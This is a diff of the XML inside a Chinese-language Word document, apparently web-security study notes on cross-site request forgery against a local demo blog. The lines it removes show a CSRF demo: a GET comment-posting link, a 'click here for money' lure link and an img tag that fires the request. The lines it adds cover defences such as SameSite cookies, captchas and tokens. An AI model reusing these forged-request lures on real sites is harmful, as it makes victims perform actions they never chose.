+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
                 <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>}</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>    });</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11814,81 +14308,16 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> HYPERLINK "http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="12"/>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>发现评论多了一条这是来自get请求的评论</w:t>
-      </w:r>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:leftChars="200"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11897,9 +14326,9 @@
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="2171700" cy="1076325"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="33" name="图片 20"/>
+            <wp:extent cx="5269230" cy="1304925"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
+            <wp:docPr id="6" name="图片 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -11907,13 +14336,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="33" name="图片 20"/>
+                    <pic:cNvPr id="6" name="图片 6"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11921,7 +14350,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2171700" cy="1076325"/>
+                      <a:ext cx="5269230" cy="1304925"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -11941,10 +14370,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -11960,46 +14385,19 @@
           <w:rFonts w:hint="default"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>&lt;a href="http://localhost:1521/ajax/addComment?postId=1&amp;content=这是来自get请求的评论"&gt;点击这里有钱拿&lt;/a&gt;</w:t>
+        <w:t>WebInspect/other/csrf.html</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>&lt;img src="http://localhost:1521/ajax/addComment?postId=1&amp;content=&lt;a href=file:///E:\BaiduYunDownload\csrf.html target='_blank'&gt;点击这里有钱拿&lt;/a&gt;" /&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="2228850" cy="1019175"/>
+            <wp:extent cx="2667000" cy="1304925"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="35" name="图片 22"/>
+            <wp:docPr id="8" name="图片 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12007,13 +14405,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="35" name="图片 22"/>
+                    <pic:cNvPr id="8" name="图片 8"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12021,7 +14419,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2228850" cy="1019175"/>
+                      <a:ext cx="2667000" cy="1304925"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -12037,12 +14435,380 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>假如该网站禁止匿名用户，那么CSRF将完全被屏蔽。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>SameSite支持的浏览器</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5269865" cy="2907030"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
+            <wp:docPr id="7" name="图片 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="图片 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5269865" cy="2907030"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>（2）不访问A网站的前端</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·在前端页面加入验证信息；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·验证码；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·带token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>npm install ccap --registry=http://registry.npm.taobao.org --save</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>npm install --global --production windows-build-tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5270500" cy="1422400"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
+            <wp:docPr id="10" name="图片 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="图片 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5270500" cy="1422400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>报如上错误，需要使用管理员权限打开cmd终端。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="8"/>
+        <w:tblW w:w="8522" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:left w:w="108" w:type="dxa"/>
+          <w:right w:w="108" w:type="dxa"/>
+        </w:tblCellMar>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="8522"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblLayout w:type="fixed"/>
+        </w:tblPrEx>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="8522" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="default"/>
+                <w:vertAlign w:val="baseline"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="0"/>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
         <w:rPr>
           <w:rFonts w:hint="default"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
@@ -12062,6 +14828,30 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="90E7CA2C"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="90E7CA2C"/>
+    <w:lvl w:ilvl="0" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val="（%1）"/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="9D885126"/>
+    <w:multiLevelType w:val="singleLevel"/>
+    <w:tmpl w:val="9D885126"/>
+    <w:lvl w:ilvl="0" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val="（%1）"/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="DDA1B859"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="DDA1B859"/>
@@ -12073,8 +14863,166 @@
       <w:lvlJc w:val="left"/>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
+    <w:nsid w:val="05754E3B"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="05754E3B"/>
+    <w:lvl w:ilvl="0" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="0">
+      <w:start w:val="1"/>
